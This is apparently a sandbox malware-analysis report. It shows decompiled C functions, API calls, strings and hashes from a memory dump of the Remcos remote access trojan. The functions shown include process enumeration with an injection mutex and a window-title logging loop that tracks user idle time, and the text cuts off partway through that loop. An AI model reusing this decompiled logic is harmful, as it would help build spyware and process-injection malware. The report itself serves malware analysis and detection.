API String ID: 161543041-0
Opcode ID: 2e11e412de02299a65fd07570426d20aa826aac2cd59b7585f84b32087a54eef
Instruction ID: 3af6918d59c6278b8509eb01b5c257c31b9524c465becf7c90f5503dc68dd4fd
Opcode Fuzzy Hash: 2e11e412de02299a65fd07570426d20aa826aac2cd59b7585f84b32087a54eef
Instruction Fuzzy Hash: 37317A31A80205EEEB21BA38D84DB6A73E8AF01320F184529E258D7191EF3DEC548B60

Uniqueness

Uniqueness Score: -1.00%

Function 0074CE44, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 186
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0074CE44(void* __eflags, char _a4) {
				void* _v8;
				char _v32;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v96;
				char _v120;
				char _v648;
				intOrPtr _v676;
				void* _v684;
				short _v1204;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				struct _SECURITY_ATTRIBUTES* _t106;
				char* _t111;
				void* _t158;
				void* _t161;

				_t106 = 0;
				GetModuleFileNameW(0,  &_v1204, 0x104);
				_t149 = "1";
				if(E00747744("1") != 0) {
					L14:
					E00741EFA( &_a4, _t149, _t159, E00756E1B(_t106,  &_v120, _t149));
					_t111 =  &_v120;
					E00741EF0();
					if(E00757614(_t111) != 0) {
						_push(_t111);
						if(E0074D4AF( &_a4, L"Program Files\\") != 0xffffffff) {
							E0074D4D0(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");
						}
					}
					if(E0074EAE5( &_v1204,  &_a4) != 0) {
						L22:
						E00741EF0();
						return _t106;
					} else {
						L18:
						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");
						E007420D5(_t106,  &_v96);
						E007579DC(E00741EEB(0x7ac500),  &_v96);
						E00741F95( &_v96);
						if(E0075432B(E00741EEB( &_a4)) == 0) {
							CloseHandle(_t158);
						} else {
							_t106 = 1;
							E00750BB0(0x7ac518, E00741F95(0x7ac518), "Inj", 1);
						}
						E00741FC7();
						goto L22;
					}
				}
				E00741F6D(0,  &_v32);
				_t76 = CreateToolhelp32Snapshot(2, 0);
				_v8 = _t76;
				_v684 = 0x22c;
				Process32FirstW(_t76,  &_v684);
				while(Process32NextW(_v8,  &_v684) != 0) {
					E0074427F(_t106,  &_v56,  &_v648);
					_t157 = E0074230A( &_v56,  &_v60);
					_t159 = E007422CD( &_v56,  &_v64);
					E00748226( &_v72,  *((intOrPtr*)(E0074230A( &_v56,  &_v68))),  *_t84,  *_t82);
					_t161 = _t161 + 0xc;
					if(E00749EAC( &_a4) != 0) {
						E00741EFA( &_v32, _v676, _t159, E00757678( &_v120, _v676));
						E00741EF0();
						if(E00747744( &_v1204) == 0) {
							_t149 = 0x79f724;
							if(E00747744(0x79f724) != 0 || E00757642(_v676) != 0) {
								E00741EF0();
								L13:
								E00741EF0();
								goto L14;
							} else {
								E00749E56( &_v32);
								E00741EF0();
								break;
							}
						}
						E00741EF0();
						E00741EF0();
						goto L22;
					}
					E00741EF0();
				}
				CloseHandle(_v8);
				_t149 = 0x79f724;
				if(E00747744(0x79f724) != 0) {
					goto L13;
				}
				E00741EF0();
				goto L18;
			}

0x0074ce5c
0x0074ce5f
0x0074ce65
0x0074ce74
0x0074cfd5
0x0074cfe1
0x0074cfe6
0x0074cfe9
0x0074cff5
0x0074cff7
0x0074d008
0x0074d015
0x0074d015
0x0074d008
0x0074d02a
0x0074d0a4
0x0074d0a7
0x0074d0b4
0x0074d02c
0x0074d02c
0x0074d03d
0x0074d03f
0x0074d053
0x0074d05b
0x0074d075
0x0074d096
0x0074d077
0x0074d07e
0x0074d08c
0x0074d092
0x0074d09f
0x00000000
0x0074d09f
0x0074d02a
0x0074ce7d
0x0074ce85
0x0074ce91
0x0074ce96
0x0074cea0
0x0074cf07
0x0074ceb2
0x0074cec3
0x0074ced1
0x0074cee8
0x0074ceed
0x0074cefd
0x0074cf58
0x0074cf60
0x0074cf75
0x0074cf8c
0x0074cf9b
0x0074cfc8
0x0074cfd0
0x0074cfd0
0x00000000
0x0074cfac
0x0074cfb3
0x0074cfbb
0x00000000
0x0074cfbb
0x0074cf9b
0x0074cf7a
0x0074cf82
0x00000000
0x0074cf82
0x0074cf02
0x0074cf02
0x0074cf1e
0x0074cf24
0x0074cf36
0x00000000
0x00000000
0x0074cf3c
0x00000000

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,007AC578,00000000,00000001), ref: 0074CE5F
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0074CE85
Process32FirstW.KERNEL32(00000000,?), ref: 0074CEA0
Process32NextW.KERNEL32(0074C873,0000022C), ref: 0074CF11
CloseHandle.KERNEL32(0074C873,?,00000000,?,?,?), ref: 0074CF1E
CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 0074D034
CloseHandle.KERNEL32(00000000), ref: 0074D096

Part of subcall function 00757678: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0075768D

Strings

Remcos_Mutex_Inj, xrefs: 0074D02C
Program Files (x86)\, xrefs: 0074D00A
Program Files\, xrefs: 0074CFF8
Inj, xrefs: 0074D080

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
API String ID: 193334293-694575909
Opcode ID: 456ca889df31dbef7a0c01afc994c632b5298dbdffc8898aa66f44d16e0d6997
Instruction ID: 0b963b3e7fc942958548b5c326f60d06956f211ca9dd2051e9aeb139bd9c243e
Opcode Fuzzy Hash: 456ca889df31dbef7a0c01afc994c632b5298dbdffc8898aa66f44d16e0d6997
Instruction Fuzzy Hash: FF617471900108EBCF14FFA0D89A9EDB77ABF51345F904169F916670A2EF3C6E4ACA50

Uniqueness

Uniqueness Score: -1.00%

Function 00788880, Relevance: 18.4, APIs: 12, Instructions: 376
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00788880(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = E0077F348(0, 1, 0x50);
					_v8 = _t234;
					E007801F5(0);
					if(_t234 != 0) {
						_t227 = E0077F348(0, 1, 4);
						_v12 = _t227;
						E007801F5(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x7aa188, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = E0077F348(0, 1, 4);
							_v16 = _t232;
							E007801F5(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E0078B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E0078B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E0078B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E0078B0F4(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E0078B0F4(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E0078B0F4(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E0078B0F4(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E0078B0F4(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E0078B0F4(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E0078B0F4(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E0078B0F4(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E0078B0F4(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E0078B0F4(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E0078B0F4(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E0078B0F4(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E0078B0F4(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E0078B0F4(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E0078B0F4(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E0078B0F4(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E0078B0F4(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E0078B0F4(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E00788782(_v8);
								E007801F5(_v8);
								E007801F5(_v12);
								E007801F5(_v16);
								goto L4;
							}
							E007801F5(_t234);
							E007801F5(_v12);
							L7:
							goto L4;
						}
						E007801F5(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x7aa188;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E007801F5( *(_t210 + 0x88));
							E007801F5( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}

0x00788880
0x00788889
0x00788890
0x00788893
0x00788896
0x0078889f
0x007888c1
0x007888c5
0x007888c8
0x007888d2
0x007888e5
0x007888e9
0x007888ec
0x007888f6
0x00788908
0x00788b9e
0x00788b9f
0x00788ba1
0x00788ba9
0x00788bad
0x00788bb2
0x00788bbd
0x00788bc9
0x00788bd5
0x00788be1
0x00788be7
0x00788beb
0x00788bed
0x00788bed
0x00000000
0x00788beb
0x00788917
0x0078891b
0x0078891e
0x00788928
0x0078893c
0x00788942
0x00788957
0x0078896b
0x00788982
0x0078899c
0x007889a4
0x007889b6
0x007889cd
0x007889e4
0x007889fe
0x00788a15
0x00788a2c
0x00788a43
0x00788a5d
0x00788a74
0x00788a8b
0x00788aa2
0x00788abc
0x00788ad3
0x00788aea
0x00788b01
0x00788b1b
0x00788b37
0x00788b65
0x00788b78
0x00788b69
0x00788b6d
0x00788b81
0x00000000
0x00000000
0x00788b83
0x00788b85
0x00788b88
0x00788b8a
0x00788b8d
0x00788b73
0x00788b75
0x00788b77
0x00788b77
0x00788b77
0x00788b6d
0x00000000
0x00788b7d
0x00788b3d
0x00788b43
0x00788b4c
0x00788b55
0x00000000
0x00788b5a
0x0078892b
0x00788934
0x007888fe
0x00000000
0x007888fe
0x007888f9
0x00000000
0x007888f9
0x007888d4
0x00000000
0x007888a9
0x007888a9
0x007888ab
0x007888ae
0x00788bef
0x00788bef
0x00788bf7
0x00788bf9
0x00788bf9
0x00788c01
0x00788c06
0x00788c0a
0x00788c12
0x00788c1a
0x00788c20
0x00788c0a
0x00788c24
0x00788c29
0x00788c2f
0x00000000
0x00788c2f

APIs

_free.LIBCMT ref: 007888C8
_free.LIBCMT ref: 007888EC
_free.LIBCMT ref: 007888F9
_free.LIBCMT ref: 0078891E
_free.LIBCMT ref: 0078892B
_free.LIBCMT ref: 00788934
_free.LIBCMT ref: 00788C12
_free.LIBCMT ref: 00788C1A

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 66978e8474050abbfbced647814a0ecbf68410a1513215a8e60dd891430f0ca6
Instruction ID: 8b1ad90e82053e620e17fd14f5df5c6d4a1ad76a45f49da25a20990bff261f77
Opcode Fuzzy Hash: 66978e8474050abbfbced647814a0ecbf68410a1513215a8e60dd891430f0ca6
Instruction Fuzzy Hash: C3C146B1E80205EFDB60EBA8CC86FEE77F8AB44710F544165FA04FB282D674A9458761

Uniqueness

Uniqueness Score: -1.00%

Function 0078F255, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0078F255(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E0078EFB8(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E00788575(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E0078EF23();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E007884BE(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x7ab800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = E0078ECD6(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x7ab800 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E0078EF23();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x7ab800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E0077A4CE(GetLastError());
											 *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E00788687( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E0078F134(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E0078551E(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E0077A4CE(_t270);
							 *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x7ab800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(E0077A504())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x7ab800 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0077A4CE(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E0078EF23();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0077A4F1()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(E0077A504())) = 0x18;
						goto L2;
					}
				} else {
					 *(E0077A4F1()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(E0077A504()));
				}
			}

0x0078f278
0x0078f27c
0x0078f27d
0x0078f27d
0x0078f27d
0x0078f27f
0x0078f285
0x0078f2a0
0x0078f2a5
0x0078f2a8
0x0078f2aa
0x0078f2ac
0x0078f2cb
0x0078f2d2
0x0078f2d9
0x0078f2dc
0x0078f2e8
0x0078f2eb
0x0078f2f3
0x0078f2f4
0x0078f2f7
0x0078f2f7
0x0078f2fe
0x0078f300
0x0078f303
0x0078f30b
0x0078f30e
0x0078f37b
0x0078f37c
0x0078f382
0x0078f384
0x0078f3cd
0x0078f3d0
0x0078f3d9
0x0078f3dc
0x0078f3df
0x0078f3e1
0x0078f3e1
0x0078f3e1
0x0078f3d2
0x0078f3d5
0x0078f3d5
0x0078f3e6
0x0078f3e9
0x0078f3f5
0x0078f3fa
0x0078f406
0x0078f410
0x0078f414
0x0078f41e
0x0078f421
0x0078f42c
0x0078f431
0x0078f441
0x0078f444
0x0078f448
0x0078f449
0x0078f44f
0x0078f454
0x0078f457
0x0078f459
0x0078f45b
0x0078f460
0x0078f463
0x0078f465
0x0078f48f
0x0078f4b3
0x0078f4b7
0x0078f4bb
0x0078f4bd
0x0078f4c1
0x0078f4c3
0x0078f4cd
0x0078f4d0
0x0078f4d7
0x0078f4d7
0x0078f4d7
0x0078f4d7
0x0078f4c1
0x0078f4dc
0x0078f4e8
0x0078f4ea
0x0078f575
0x0078f575
0x00000000
0x0078f4f0
0x0078f4f0
0x0078f4f4
0x00000000
0x00000000
0x0078f4f9
0x0078f50b
0x0078f513
0x0078f516
0x0078f517
0x0078f51a
0x0078f521
0x0078f526
0x0078f529
0x0078f55d
0x0078f567
0x0078f567
0x0078f571
0x00000000
0x0078f571
0x0078f532
0x0078f54b
0x0078f552
0x0078f375
0x00000000
0x0078f375
0x0078f4ea
0x0078f467
0x00000000
0x0078f433
0x0078f43a
0x0078f43d
0x0078f43f
0x0078f469
0x0078f46b
0x00000000
0x0078f471
0x00000000
0x0078f43f
0x0078f431
0x0078f38c
0x0078f38f
0x0078f3aa
0x0078f3af
0x0078f3b5
0x0078f3b7
0x0078f3c2
0x0078f3c2
0x00000000
0x0078f3b7
0x0078f310
0x0078f317
0x0078f319
0x0078f350
0x0078f350
0x0078f35a
0x0078f35d
0x0078f364
0x0078f364
0x0078f364
0x0078f370
0x00000000
0x0078f370
0x0078f31b
0x0078f31f
0x00000000
0x00000000
0x0078f321
0x0078f330
0x0078f335
0x0078f338
0x0078f339
0x0078f33c
0x0078f33c
0x0078f343
0x0078f345
0x0078f348
0x0078f34b
0x0078f34e
0x00000000
0x00000000
0x00000000
0x0078f2ae
0x0078f2b3
0x0078f2b6
0x0078f2bd
0x00000000
0x0078f2bd
0x0078f287
0x0078f28c
0x0078f292
0x0078f294
0x00000000
0x0078f299

APIs

Part of subcall function 0078EF23: CreateFileW.KERNEL32(00000000,00000000,?,0078F2FE,?,?,00000000,?,0078F2FE,00000000,0000000C), ref: 0078EF40

GetLastError.KERNEL32 ref: 0078F369
__dosmaperr.LIBCMT ref: 0078F370
GetFileType.KERNEL32(00000000), ref: 0078F37C
GetLastError.KERNEL32 ref: 0078F386
__dosmaperr.LIBCMT ref: 0078F38F
CloseHandle.KERNEL32(00000000), ref: 0078F3AF
CloseHandle.KERNEL32(?), ref: 0078F4F9
GetLastError.KERNEL32 ref: 0078F52B
__dosmaperr.LIBCMT ref: 0078F532

Strings

H, xrefs: 0078F4B7

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 1f25c5416e48e62591579cd89d5b8a1c87d1d0271d2dc451d8ced70c1a06108f
Instruction ID: 2cb85bdb8a4405ed334b0207e85163b4933c274dbb5d134ed6b390314cb977b7
Opcode Fuzzy Hash: 1f25c5416e48e62591579cd89d5b8a1c87d1d0271d2dc451d8ced70c1a06108f
Instruction Fuzzy Hash: 66A15532A501489FDF18EF68D885BAE7BB0AB46320F14416AF815DB292DB3D8D12CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00749195, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00749195(void* __ecx, void* __edx) {
				char _v28;
				char _v56;
				char _v76;
				char _v80;
				char _v100;
				void* _v104;
				char _v108;
				char _v112;
				struct HWND__* _v116;
				void* __ebx;
				void* __edi;
				int _t36;
				struct HWND__* _t42;
				void* _t50;
				int _t57;
				struct HWND__* _t77;
				void* _t119;
				signed int _t125;
				void* _t127;

				_t112 = __edx;
				_t127 = (_t125 & 0xfffffff8) - 0x74;
				_push(_t77);
				_push(0xea60);
				_t119 = __ecx;
				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
					Sleep(0x1f4);
					_t77 = GetForegroundWindow();
					_t36 = GetWindowTextLengthW(_t77);
					_t4 = _t36 + 1; // 0x1
					E00749DEC(_t77,  &_v100, _t112, _t119, _t4, 0);
					if(_t36 != 0) {
						_t57 = E00742489();
						GetWindowTextW(_t77, E00741EEB( &_v100), _t57);
						_t112 = 0x7add0c;
						if(E00749EAC(0x7add0c) == 0) {
							E00749DD2(0x7add0c,  &_v100);
							E0074733F(E00742489() - 1);
							_t127 = _t127 - 0x18;
							_t136 =  *0x7ac39b;
							if( *0x7ac39b == 0) {
								_t112 = E00749E69( &_v76, L"\r\n[ ", __eflags,  &_v108);
								E007430A6(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
								E00748B80(_t119);
								E00741EF0();
							} else {
								E00747350(_t77, _t127, 0x7add0c, _t136,  &_v108);
								E00749634(_t77, _t119, _t136);
							}
						}
					}
					_t83 = _t119;
					E00749C15(_t119);
					if(E007571D6(_t119) < 0xea60) {
						L18:
						E00741EF0();
						continue;
					} else {
						_t77 = _v116;
						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
							_t42 = E007571D6(_t83);
							if(_t42 < 0xea60) {
								__eflags = _t77 % 0xea60;
								E0077BACE(_t83, _t77 / 0xea60,  &_v112, 0xa);
								_t50 = E00745343(_t77,  &_v80, E007475C2(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00742084(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
								_t127 = _t127 + 0xc - 0x14;
								_t112 = _t50;
								E007572DA(_t127, _t50);
								E00748B80(_t119);
								E00741FC7();
								E00741FC7();
								E00741FC7();
								goto L18;
							}
							_t77 = _t42;
							_v116 = _t77;
